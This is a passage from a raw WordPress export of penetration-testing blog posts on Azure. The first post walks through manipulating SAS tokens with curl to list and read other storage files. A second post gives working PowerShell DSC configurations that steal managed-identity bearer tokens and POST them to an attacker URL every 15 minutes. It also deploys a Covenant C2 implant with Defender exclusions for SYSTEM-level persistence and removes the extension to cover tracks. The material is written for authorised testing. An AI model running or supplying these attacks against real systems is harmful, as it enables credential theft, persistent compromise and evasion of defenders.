      • This must be an account SAS since it provides access to multiple services. 
    • Signed Resource Types (srt): sco
      • We’re authorized for all service-level, container-level and object-level APIs.
    • Signed Expiry (se): 2500-11-30T08:00:00Z
      • The token is valid for hundreds of years. 
    • The additional values are required for the SAS token but are not very useful to us.

Our key observations for this SAS are:

  1. We can read containers and objects across the File and Blob storage services. 
  2. We are using an account SAS which does not impose hidden restrictions. 
  3. We have a very long-lived SAS which can be used to persist access until the storage account keys are rotated.

Let’s get started using these privileges. As we saw in Example 1, we can update our SAS to list other files in the same file share and directory with the following changes:

  1. We need to change the path in the resource URL to only reference the directory, not a specific blob.
    1. Original: /testfileshare/testfilesharedirectory/testsastokenfile.txt
    2. New: /testfileshare/testfilesharedirectory
  2. We need to add the following URL parameters before or after the SAS token to perform the list action on the directory: restype=directory&comp=list

Like before, we’ll merge these changes into our SAS and check out the results:

curl -s 'https://testsastokenaccount.file.core.windows.net/testfil
eshare/testfilesharedirectory/?restype=directory&comp=list&sv=2020
-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T
08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw
1TU09JEY%3D' | xmllint --format -
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://testsastokenaccount.
file.core.windows.net/" ShareName="testfileshare" DirectoryPath=
"testfilesharedirectory/">
<Entries>
<File>
<Name>another_secret_file.txt</Name>
<Properties>
<Content-Length>40</Content-Length>
</Properties>
</File>
<File>
<Name>testsastokenfile.txt</Name>
<Properties>
<Content-Length>11</Content-Length>
</Properties>
</File>
</Entries>
<NextMarker/>
</EnumerationResults>
curl -s 'https://testsastokenaccount.file.core.windows.net/testfil eshare/testfilesharedirectory/?restype=directory&comp=list&sv=2020 -08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T 08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw 1TU09JEY%3D' | xmllint --format - <?xml version="1.0" encoding="utf-8"?> <EnumerationResults ServiceEndpoint="https://testsastokenaccount. file.core.windows.net/" ShareName="testfileshare" DirectoryPath= "testfilesharedirectory/"> <Entries> <File> <Name>another_secret_file.txt</Name> <Properties> <Content-Length>40</Content-Length> </Properties> </File> <File> <Name>testsastokenfile.txt</Name> <Properties> <Content-Length>11</Content-Length> </Properties> </File> </Entries> <NextMarker/> </EnumerationResults>

And just like before, we see there are additional contents in the same directory (another_secret_file.txt). We can download this directly too by changing our original storage resource URL to point to that file, just like we did in Example 1. 

Since we have an account SAS with access to Blob storage, let’s utilize that access too! We’ll update our SAS to enumerate all blob storage containers within the storage account:

  1. We’ll need to change the domain name to reference the Blob service rather than File service.
    1. Original: file.core.windows.net
    2. New: blob.core.windows.net
  2. We need to remove the path in the resource URL since we’re interacting with the top-level service.
    1. Original: /testfileshare/testfilesharedirectory/testsastokenfile.txt
    2. New: /
  3. We need to add the following URL parameters before or after the SAS token to list all containers: comp=list

We’ll merge in these changes, send off the request, and review the results:

curl -s 'https://testsastokenaccount.blob.core.windows.net/?comp=
list&sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=
2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc
%2BV7o%2Fw1TU09JEY%3D' | xmllint --format -
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://testsastokenaccount.
blob.core.windows.net/">
<Containers>
<Container>
<Name>secretcontainer</Name>
<Properties>
[TRUNCATED]
</Properties>
</Container>
<Container>
<Name>testsastokencontainer</Name>
<Properties>
[TRUNCATED]
</Properties>
</Container>
</Containers>
<NextMarker/>
</EnumerationResults>
curl -s 'https://testsastokenaccount.blob.core.windows.net/?comp= list&sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st= 2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc %2BV7o%2Fw1TU09JEY%3D' | xmllint --format - <?xml version="1.0" encoding="utf-8"?> <EnumerationResults ServiceEndpoint="https://testsastokenaccount. blob.core.windows.net/"> <Containers> <Container> <Name>secretcontainer</Name> <Properties> [TRUNCATED] </Properties> </Container> <Container> <Name>testsastokencontainer</Name> <Properties> [TRUNCATED] </Properties> </Container> </Containers> <NextMarker/> </EnumerationResults>

Looking at the output, we see the storage container from Example 1 (testsastokencontainer) and we also see another storage container: secretcontainer. We’ve already seen how to edit the SAS to list blobs in a container and read individual blobs, so let’s take a peek at what’s inside:

curl -s 'https://testsastokenaccount.blob.core.windows.net/secret
container?restype=container&comp=list&sv=2020-08-04&ss=bf&srt=sco
&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https
&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D'
| xmllint --format -
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://testsastokenaccount.
blob.core.windows.net/" ContainerName="secretcontainer">
<Blobs>
<Blob>
<Name>last_secret_file.txt</Name>
<Properties>
[TRUNCATED]
</Properties>
<OrMetadata/>
</Blob>
</Blobs>
<NextMarker/>
</EnumerationResults>
curl -s 'https://testsastokenaccount.blob.core.windows.net/secret container?restype=container&comp=list&sv=2020-08-04&ss=bf&srt=sco &sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https &sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D' | xmllint --format - <?xml version="1.0" encoding="utf-8"?> <EnumerationResults ServiceEndpoint="https://testsastokenaccount. blob.core.windows.net/" ContainerName="secretcontainer"> <Blobs> <Blob> <Name>last_secret_file.txt</Name> <Properties> [TRUNCATED] </Properties> <OrMetadata/> </Blob> </Blobs> <NextMarker/> </EnumerationResults>
curl -s 'https://testsastokenaccount.blob.core.windows.net/secretc
ontainer/last_secret_file.txt? &sv=2020-08-04&ss=bf&srt=sco&sp=rl
&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=p
Z4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D'
These are the super secret contents!
curl -s 'https://testsastokenaccount.blob.core.windows.net/secretc ontainer/last_secret_file.txt? &sv=2020-08-04&ss=bf&srt=sco&sp=rl &se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=p Z4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D' These are the super secret contents!

By analyzing and manipulating the original SAS for a specific file in the File storage service, we were able to pivot to the Blob storage service, find a new container and read the contents of a file within. 

Example 3 – Read-Only Account SAS

As a final example, let’s consider the following SAS:

https://otheraccount.blob.core.windows.net/container-dev/content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5gl2G6FsSMtcFOuNrthM%3D

And the content provided by that SAS looks pretty mundane: 

curl "https://otheraccount.blob.core.windows.net/container-dev/
content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00
Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2
F5gl2G6FsSMtcFOuNrthM%3D"
Dev Content 1
curl "https://otheraccount.blob.core.windows.net/container-dev/ content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00 Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2 F5gl2G6FsSMtcFOuNrthM%3D" Dev Content 1

For one last time, we’ll break down our SAS:

  • Resource URL
    • Domain Name: otheraccount.blob.core.windows.net
      • We can identify the storage account name: otheraccount
      • We can identify we’re authorized for Blob storage: blob.core.windows.net
    • URL Path: /container-dev/content1.txt
      • We can identify the container name: container-dev
      • We can identity the blob we’re accessing: content1.txt
  • SAS Token:
    • Signed Permissions (sp): r
      • We’re authorized for only the read actions.
    • Signed Services (ss): b
      • We’re only authorized for the Blob. 
      • This must be an account because this parameter is set. 
    • Signed Resource Types (srt): o
      • We’re only authorized for all object-level APIs.
    • The additional values are required for the SAS token but are not very useful to us.

We can see that this SAS is much more restricted. We won’t be able to hop between services or use the list action like before. But with a little bit of luck, we won’t even need that. 

Looking at the blob name content1.txt, it’s worth checking if there are any other blobs we could guess. Let’s update our SAS to point to content2.txt and see what happens.

curl "https://otheraccount.blob.core.windows.net/container-dev/
content2.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00
Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2
F5gl2G6FsSMtcFOuNrthM%3D"
Dev Content 2
curl "https://otheraccount.blob.core.windows.net/container-dev/ content2.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00 Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2 F5gl2G6FsSMtcFOuNrthM%3D" Dev Content 2

It worked! Even though we couldn’t list all the blobs, if we successfully guess the blob name (or it’s disclosed to us through other means) we can still gain access to it. Within a real web application, this may lead to an Insecure Direct Object Reference (IDOR) vulnerability. 

Let’s take a look at that container name too. If we were given access to container-dev then let’s check for container-prod as well. 

curl "https://otheraccount.blob.core.windows.net/container-prod/
content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z
&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5
gl2G6FsSMtcFOuNrthM%3D"
Prod Content 1
curl "https://otheraccount.blob.core.windows.net/container-prod/ content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z &st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5 gl2G6FsSMtcFOuNrthM%3D" Prod Content 1

Nice! We’re able to directly reference blobs within other containers within the same storage account if we can guess the correct URL path. As you could imagine, it’s not too difficult to use wordlists to build our guesses and test different URLs. In fact, the MicroBurst toolkit already provides Invoke-EnumerateAzureBlobs which enables the enumeration of public blobs and containers. Karl Fosaaen has previously written about this script on the NetSPI blog

This example shows that even a fairly limited SAS has the potential to still be abused. In particular, the account SAS type can provide vast access into a storage account and is a prime target for pentesters. 

Conclusion

Whenever we’re given direct access to Azure storage accounts through a shared access signature, we should take a close look to understand our authorization. While the SAS has many parts, it’s not too difficult to break down if you know the most important parts. Hopefully this guide can serve as a reference for the next time you come across an SAS during a pentest and help you find new content. 

Special thanks to Karl Fosaaen for the blog suggestion and Josh Magri for reviewing this write up. 

NetSPI is always looking for skilled penetration testers to join our team! Visit https://netspi.com/careers to explore our open roles.

[post_title] => Azure SAS Tokens for Web Application Penetration Testers [post_excerpt] => Learn how to abuse common misconfigurations of Azure SAS tokens using these web application penetration testing techniques. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-sas-tokens [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:23:33 [post_modified_gmt] => 2023-03-16 14:23:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27056 [menu_order] => 316 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [3] => WP_Post Object ( [ID] => 25653 [post_author] => 52 [post_date] => 2021-06-24 09:00:00 [post_date_gmt] => 2021-06-24 14:00:00 [post_content] =>

In a previous blog, I described how anyone with the Contributor role in an Azure subscription can run arbitrary scripts on the VMs of that subscription. That blog utilizes the Run Command feature and the Custom Script Extension to execute the payloads. This blog will explore how pentesters can also use the Desired State Configuration (DSC) VM extension to run arbitrary commands, with built-in functionality for recurring commands and persistence.   

Desired State Configuration in Azure

PowerShell Desired State Configuration (DSC) is existing Windows functionality that allows system administrators to declare how a computer should be configured with configuration scripts and resources. This may include installing/running services, local user management, downloading files or running PowerShell scripts. Once enabled, the Local Configuration Manager (LCM) subsystem will automatically and continually monitor the computer’s current configuration, and perform any actions required to apply the desired configuration. 

More recently, Microsoft has brought first-class support for DSC into Azure. This allows Azure administrators to utilize DSC’s powerful functionality to configure and monitor their Azure VMs at the cloud scale. Azure offers two methods of using DSC: Azure Automation State Configuration and the DSC VM extension.

Azure Automation State Configuration vs Desired State Configuration VM Extension

Azure Automation State Configuration allows administrators to use an Azure Automation Account to deploy DSC at scale across their cloud VMs and on-premise systems. This feature is integrated with the Azure Portal and provides a UI to deploy configurations and monitor the systems’ compliance. The DSC artifacts are deployed via a “pull server.” The systems will periodically report their configuration to the Automation Account and retrieve the latest configurations.

While this is very practical functionality, it’s not our best option as pentesters for a couple reasons. First, it’s not a stealthy technique for controlling the target systems. Cloud administrators can easily observe usage of the Automation State Configuration feature in the portal.  Second, when the target systems are updated to pull their DSC artifacts from our Automation Account, this may overwrite legitimate usage of the DSC feature. The target systems may lose their existing configuration, and this may interrupt daily operations. 

We’ll avoid these problems by using the DSC VM extension instead. When using the VM extension, DSC artifacts are pushed to individually targeted systems, instead of being pulled from a centralized Automation Account. When deploying artifacts, we can also check to see if DSC is already in use on the system, and if so, stop the deployment. This prevents us from overwriting existing, legitimate configurations. Lastly, the VM extension can be quickly removed after the DSC artifacts are pushed, making this much more difficult to detect in the Azure portal. The VM extension provides more targeted, fine-grain control and allows us to remain under the radar.

Running Arbitrary Scripts Through the Desired State Configuration VM Extension

While not exactly the intended use, plain PowerShell scripts can be run directly through the DSC VM extension. Other features such as RunCommand and the Custom Script extension are better suited for this, but it is interesting to see that it works (despite not actually providing any configuration). Let’s considering the following PowerShell script:

echo "Hello from DSC. I'm running as $(whoami)" > C:\dsc_hello.txt

DSCHello.ps1

To setup the script as a DSC, we’ll run the following commands from our workstation:

  1. The Publish-AzVMDscConfiguration cmdlet will compress and upload the script to a storage account of our choice.
  2. The Set-AzVMDscExtension cmdlet will add the DSC VM extension to the “jk-dsc-testing” VM. Once the extension is added, it will automatically download the script from the storage account and run it. 
PS C:\> Publish-AzVMDscConfiguration -ConfigurationPath .\DSCHello.ps1 -ResourceGroupName tester -StorageAccountName <your-storage-account-name> 
[TRUNCATED]

PS C:\> Set-AzVMDscExtension -VMName jk-dsc-testing -ConfigurationArchive "DSCHello.ps1.zip" -ConfigurationName "DSCHello" -ResourceGroupName tester -ArchiveStorageAccountName <your-storage-account-name> -Version "2.83"
Set-AzVMDscExtension : Long running operation failed with status 'Failed'. Additional Info:'VM has reported a failure when processing extension 'Microsoft.Powershell.DSC'. [TRUNCATED]

After about a minute, the second Set-AzVMDscExtension command returns an error. This is expected because our DSCHello.ps1 script does not actually include a valid DSC configuration. Despite this error, our script was executed on the target VM. We can confirm this by using the RunCommand feature to check the contents of the output file: C:\dsc_hello.txt. 

RunCommand Output
RunCommand Output

The output within the file confirms that the script was executed successfully, despite the error returned by the Set-AzVMDscExtension command. It also confirms that our script is running as SYSTEM on the VM. 

While it’s nice to know that the DSC VM extension can be used for one-off scripts, there are better tools for this task at our disposal. We’ll instead focus on utilizing the power of DSC for our more common tasks as pentesters. 

Practical DSC Extension Usage

While the above process does result in privileged script execution, it doesn’t maximize the functionality offered by the DSC VM extension. We can improve upon this in several ways. 

Using Actual DSC Configuration Artifacts

The simplest improvement is to add an actual configuration to our script. There are many different types of DSC Resources that can be used within a DSC configuration. The most versatile is the Script Resource which we’ll use to wrap whatever functionality we’d like to deploy. If we were rewriting the above example to use a Script Resource, that would appear in our DSC script as:

Configuration DSCHello
{
	Node localhost
	{
		Script ScriptExample
		{
			SetScript = {
				echo "Hello from DSC. I'm running as $(whoami)" > C:\dsc_hello.txt
			}
			TestScript = { 
				return Test-Path C:\dsc_hello.txt 
			}
			GetScript = { @{ Result = (Get-Content C:\dsc_hello.txt) } }
		}
	}
}

DSCHello.ps1 (with Configuration and Script Resource)

When deployed via the DSC VM extension with the previous commands, the Set-AzVMDscExtension command will now complete successfully because we’ve provided a well-formed DSC configuration. We’ve also provided a TestScript which will test for the presence of the C:\dsc_hello.txt output file. 

Automatic Recurring Execution

One of the key features of DSC is the capability to detect if a system has drifted from its desired state, and to automatically apply any necessary configuration changes. We can use this built-in functionality to automatically run our commands as many times as we’d like. We’ll see some additional examples of this later in the post, but for now we’ll continue the example from above. Note the TestScript ScriptBlock in the previous code segment. If the C:\dsc_hello.txt file is ever removed from the file system after the initial execution, the TestScript command will return false, and the SetScript command will be run again. 

While this capability is built into DSC, it’s not enabled by default. But we can enable it while deploying our DSC artifacts to the target system. To do that, we’ll prepend the following commands to our growing DSCHello.ps1 script. 

[DscLocalConfigurationManager()]
Configuration DscMetaConfigs
{
	Node localhost
    {
		Settings
        {
             RefreshFrequencyMins           = 30
             RefreshMode                    = 'PUSH'
             ConfigurationMode              = 'ApplyAndAutoCorrect'
             AllowModuleOverwrite           = $False
             RebootNodeIfNeeded             = $False
             ActionAfterReboot              = 'ContinueConfiguration'
             ConfigurationModeFrequencyMins = 15
        }
	}
}
DscMetaConfigs -Output .\output\
Set-DscLocalConfigurationManager -Path .\output\

Commands to be added to DSCHello.ps1 to enable automatic recurring execution.

These commands will update the DSC Local Configuration Manager (LCM), which is the subsystem responsible for keeping the system in its configured desired state. The key update is changing the “ConfigurationMode” value to “ApplyAndAutoCorrect” to ensure our SetScript commands are executed whenever the TestScript block returns false. After this update, the LCM will check the system’s configuration every 15 minutes and applies any necessary configurations. Unfortunately, this is the most frequent schedule that can be configured.

Polite Execution: Checking if DSC is Already in Use

As mentioned earlier, we wouldn’t want to make these DSC/LCM updates if the target system is already using DSC for a legitimate purpose. In a standard pentest, this has too high of a risk of disrupting normal functionality. And in a red team scenario, this change could lead to more rapid detection by the blue team. 

To avoid this, we can update our script to check if the system currently has any DSC configuration already applied. By prepending the following commands to our ever-growing DSCHello.ps1 file, the script will first check if there’s an existing configuration, and exit if any exists. 

$type = Get-DscConfigurationStatus | select -ExpandProperty Type
if ( $? -and ($type -ne 'Initial'))
{
    exit
}

Commands to be added to DSCHello.ps1 to exit if DSC is already in use.

With this addition, our DSCHello.ps1 file is complete and ready for deployment. It will confirm that the DSC feature is not already in-use on the target system. It will configure the LCM to automatically re-execute our commands as needed. And it will complete successfully because it provides a well-formed DSC configuration and resource. The complete version of this example script is available for review here.  

Covering Tracks: Removing the DSC VM Extension

After deploying the DSC VM extension, it can be viewed in the Azure Portal under the target VM’s “Extensions” blade. 

Azure Persistence with Desired State Configurations

If you click the “View detailed status” link, there are execution details, including some of the script output. To cover our tracks, we can eliminate this information by simply removing the DSC VM extension itself using the Remove-AzVMDscExtension cmdlet.  This removes the extension information from the portal and deletes the deployment artifacts from the target VM. However, is does leave behind the existing logs in the C:\WindowsAzure\Logs\Plugins\Microsoft.Powershell.DSC\<VERSION> directory.

Fortunately for us though, this does not remove the deployed DSC configuration from the target VM. If configured as a recurring or persistent task, it will continue to run on the set schedule. We’re free to clean up the extension and artifacts, and still retain our functionality.

Deploying Pre-Configured DSC Artifacts

The official Set-AzVMDscExtension cmdlet is very useful but it assumes that the DSC artifacts to be deployed were uploaded to a caller-controlled storage account using the Publish-AzVMDscConfiguration command. While this is generally true for its intended usage, this is not ideal for pentesters. To use the Set-AzVMDscExtension command against a targeted VM in an engagement, we would have to also upload the DSC artifacts into a storage account within the same Azure subscription using the Publish-AzVMDscConfiguration command. This leaves behind additional artifacts which may be detected by the blue team, and reduces re-usability of our artifacts. 

As a workaround, I’ve added the Invoke-DscVmExtension function to the MicroBurst framework. This is a reimplementation of the Set-AzVMDscExtension cmdet which instead deploys DSC artifacts hosted at any publicly accessible URL. The example DSC artifacts used throughout this blog are hosted in the MicroBurst GitHub repo and available for use. We can use the Invoke-DscVMExtension function to deploy the DSC VM extension and download our pre-made artifacts from there. This greatly increases the reusability of these artifacts. 

Additionally, the Invoke-DscVmExtension function automatically removes the DSC VM extension from the target system after the deployment. This results in a stealthier overall deployment.

We can use this single function to do the following:

  1. Add the DSC VM extension to a target VM which performs the following:
    1. Download the publicly hosted, reusable artifacts from an input URL.
    2. Check if any DSC configurations are already in use.
    3. Update the Local Configuration Manager to automatically run our deployed configuration every 15 minutes. 
    4. Run the provided script as SYSTEM.
  2. Remove the DSC VM extension to cover our tracks in the portal.

And here’s how it looks in action:

PS C:\ > Invoke-DscVmExtension -Name jk-dsc-testing -ResourceGroupName tester  -ConfigurationArchiveURL "https://github.com/NetSPI/MicroBurst/raw/master/Misc/DSC/DSCHello.ps1.zip"
Deploying DSC to VM: jk-dsc-testing
Deployment Successful: True
Deleting DSC extension from VM: jk-dsc-testing
Removal Successful: True

Execution of Invoke-DscVmExtension function

Example 1: A Recurring Task to Export Managed Identity Tokens

An Azure VM can be directly assigned permissions to other Azure resources through the VM’s managed identity. NetSPI’s Karl Fosaaen has thoroughly explored how attackers and pentesters can exploit this in his previous blogs. If you’d like a deeper dive into managed identities, I recommend his in-depth review here. In that blog, Karl describes how anyone with command execution on the VM can obtain an access token for that VM’s managed identity by sending an HTTP request to the Azure Metadata Service URL. 

Additionally, NetSPI’s Josh Magri explored in his blog post how bearer tokens can be passed to the Azure REST APIs to perform actions authorized as that identity. This provides a straightforward mechanism for enumerating the target subscription and moving laterally/vertically. 

Let’s combine these concepts with the DSC VM extension. We’ll deploy a DSC configuration which will execute our commands. Our configuration will send a request to the Azure Metadata Service from the target VM and obtain the bearer token for that VM’s managed identity. Once we’ve obtained the bearer token, we’ll exfiltrate it from the server by sending an HTTP POST request to a URL of our choice. 

The full code for the script is available for review here, but the core DSC configuration is included below:

Configuration ExportManagedIdentityToken
{

  param
  (
    [String]
    $ExportURL
  )

  Import-DscResource -ModuleName 'PSDesiredStateConfiguration'

  Node localhost
  {
    Script ScriptExample
    {
      SetScript = {
        $metadataResponse = Invoke-WebRequest -Uri 'https://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls12
        Invoke-RestMethod -Method 'Post' -URI $using:ExportURL -Body $metadataResponse.Content -ContentType "application/json"
      }
      TestScript = {
        return $false
      }
      GetScript = { return @{result = 'result'} }
    }
  }
} 

The ExportManagedIdentityToken.ps1 Configuration Snippet

In the above configuration, there are a few of key components:

  1. Note that we’re passing in the $ExportURL value as a Configuration parameter. This allows us to re-use the configuration and decide where the bearer token will be exfilitrated at deployment time. 
  2. As described earlier, the SetScript script block obtains the bearer token from the Azure Metadata Service URL and sends it as a POST request to the $ExportURL value.
  3. The TestScript ScriptBlock always returns false. This ensures the commands are executed 15 minutes, guaranteeing we always have a fresh, valid bearer token for extended persistence. 

To receive and process the bearer token sent by the script, we’ll deploy a simple PowerShell Azure Function App to a separate subscription under our control. This will extract the incoming bearer token and call the Azure REST APIs to review the permissions assigned to it. The full code for the Function App is available here and essentially copy-pasted from Josh’s blog in the “Enumeration” section. 

We’ll deploy the script with the Invoke-DscVmExtension function described in the previous section. In this example, we’ll pass the target VM via the pipeline, and we’ll pass the $ExportURL value as a ConfigurationArgument. The function will automatically handle the deployment and cleanup.

PS C:\ > Get-AzVM -Name jk-dsc-testing -ResourceGroupName tester  |  Invoke-DscVmExtension -ConfigurationArchiveURL "https://github.com/NetSPI/MicroBurst/raw/master/Misc/DSC/ExportManagedIdentityToken.ps1.zip" -ConfigurationArgument @{ExportURL="https://[your-function-app].azurewebsites.net/api/TokenEndpoint"}
Deploying DSC to VM: jk-dsc-testing
Deployment Successful: True
Deleting DSC extension from VM: jk-dsc-testing
Removal Successful: True

Deploying the ExportManagedIdentityToken script via the Invoke-DscVmExtension function

During the deployment, and every 15 minutes thereafter, the bearer token will be POSTed to the Function App. We can monitor the Function App’s logs to observe the incoming value and which permissions are assigned to the managed identity. 

2021-06-08T04:13:45.474 [Information] Executing 'Functions.MgCatchingFunction' (Reason='This function was programmatically called via the host APIs.', Id=d0dd2ee5-6b47-48c6-8bf2-10e74197e769)
2021-06-08T04:13:45.481 [Information] INFORMATION: PowerShell HTTP trigger function processed a request. Incoming JSON contents
2021-06-08T04:13:45.486 [Information] OUTPUT:
2021-06-08T04:13:45.487 [Information] OUTPUT: Name                           Value
2021-06-08T04:13:45.491 [Information] OUTPUT: ----                           -----
2021-06-08T04:13:45.491 [Information] OUTPUT: resource                       https://management.azure.com/
2021-06-08T04:13:45.492 [Information] OUTPUT: access_token                   eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyIsImtp…
2021-06-08T04:13:45.492 [Information] OUTPUT: expires_on                     1623209325
2021-06-08T04:13:45.492 [Information] OUTPUT: ext_expires_in                 86399
2021-06-08T04:13:45.493 [Information] OUTPUT: token_type                     Bearer
2021-06-08T04:13:45.494 [Information] OUTPUT: client_id                      367d6d5b-cf5f-4818-abb6-b6ea700b377f
2021-06-08T04:13:45.495 [Information] OUTPUT: not_before                     1623122625
2021-06-08T04:13:45.495 [Information] OUTPUT: expires_in                     83700
2021-06-08T04:13:45.495 [Information] INFORMATION: Access token
2021-06-08T04:13:45.496 [Information] OUTPUT: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyIsImtp…
2021-06-08T04:13:45.496 [Information] INFORMATION: Principal ID
2021-06-08T04:13:45.496 [Information] OUTPUT: 821ace7f-e6d8-4ba2-8304-ef45fbb4fb19
2021-06-08T04:13:45.496 [Information] INFORMATION: /subscriptions/d4[REDACTED]b2/resourcegroups/tester/providers/Microsoft.Compute/virtualMachines/jk-dsc-testing
2021-06-08T04:13:45.497 [Information] INFORMATION: Subscription ID
2021-06-08T04:13:45.497 [Information] OUTPUT: d4[REDACTED]b2
2021-06-08T04:13:45.497 [Information] INFORMATION: VM Name
2021-06-08T04:13:45.497 [Information] OUTPUT: jk-dsc-testing
2021-06-08T04:13:46.001 [Information] OUTPUT: Current identity has permission Reader on scope /subscriptions/d4[REDACTED]b2

Deploying the ExportManagedIdentityToken script via the Invoke-DscVmExtension function

Example 2: A Persistent Command and Control Implant

Using DSC, not only can we execute tasks on a recurring schedule, but we can also utilize its self-correcting behavior to deploy persistent C2 implants on the target VM. In the example below, we’ll be using Covenant as our C2 framework. This will both host our malicious executable and listen for its callback. This blog won’t cover how to use Covenant, but for more information on that topic, please see my previous blog post in which I deployed Covenant’s implants (“grunts”) using Azure’s Custom Script Extension. 

The DeployDSCAgent DSC configuration performs the following tasks:

  1. Create a destination folder for the executable to be downloaded into.
  2. Create a Windows Defender exclusion for the destination folder. 
  3. Create a Windows Defender exclusion for the full path of the executable. 
  4. Create a Windows Defender exclusion for the executable’s process.
  5. Download the hosted implant from the input URL. 
  6. Executes the malicious implant, providing remote control as the SYSTEM process.

The full code for the DSC configuration is relatively simple, but a bit too long to include here. If you’re interested, the code is available for review on GitHub. Deploying the DSC extension to the target VM is as straightforward as before:

PS C:\ > Get-AzVM -Name jk-dsc-testing -ResourceGroupName tester  |  Invoke-DscVmExtension -ConfigurationArchiveURL "https://github.com/NetSPI/MicroBurst/raw/master/Misc/DSC/DeployDSCAgent.ps1.zip" -ConfigurationArgument @{ImplantURL="https://172.18.0.5/GruntHTTP40.exe"}
Deploying DSC to VM: jk-dsc-testing
Deployment Successful: True
Deleting DSC extension from VM: jk-dsc-testing
Removal Successful: True

Deploying the DeployDSCAgent script via the Invoke-DscVmExtension function

A few minutes after the Invoke-DscVmExtension command is started, our Covenant listener will detect that the implant has been executed and is awaiting further commands. 

The Covenant implant is deployed and connects back to the C2 server.
The Covenant implant is deployed and connects back to the C2 server.

The beauty of using DSC for this task is that the status of the above 6 tasks will be automatically checked every 15 minutes. If any of them are incomplete (for example, if a sysadmin deletes our implant, kills the process, or removes the Defender exclusions) then they will be automatically re-executed along with any previous steps. This provides us with robust persistence on the target VM.  

Final Thoughts

We’ve seen how the DSC VM extension provides yet another mechanism for privileged Azure users (such as those with the Contributor role) to achieve command execution on Azure VMs. While other VM extensions provide command execution as well, the DSC VM extension offers built-in support for recurring commands and advanced persistence techniques. The Invoke-DscVmExtension cmdlet added into the MicroBurst framework provides easy reusability of premade, public DSC configurations for use on multiple pentest engagements. All together, the DSC VM extension is robust tool which should be considered for any Azure pentester.  

[post_title] => Azure Persistence with Desired State Configurations [post_excerpt] => See how the Azure Desired State Configuration VM Extension can be utilized by pentesters for robust persistence and recurring tasks. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-persistence-with-desired-state-configurations [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:24:44 [post_modified_gmt] => 2023-03-16 14:24:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25653 [menu_order] => 387 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [4] => WP_Post Object ( [ID] => 25556 [post_author] => 52 [post_date] => 2021-06-09 07:00:00 [post_date_gmt] => 2021-06-09 07:00:00 [post_content] =>

On June 9, 2021, NetSPI Security Consultant Jake Karnes was featured in a SecureAuth article:

 

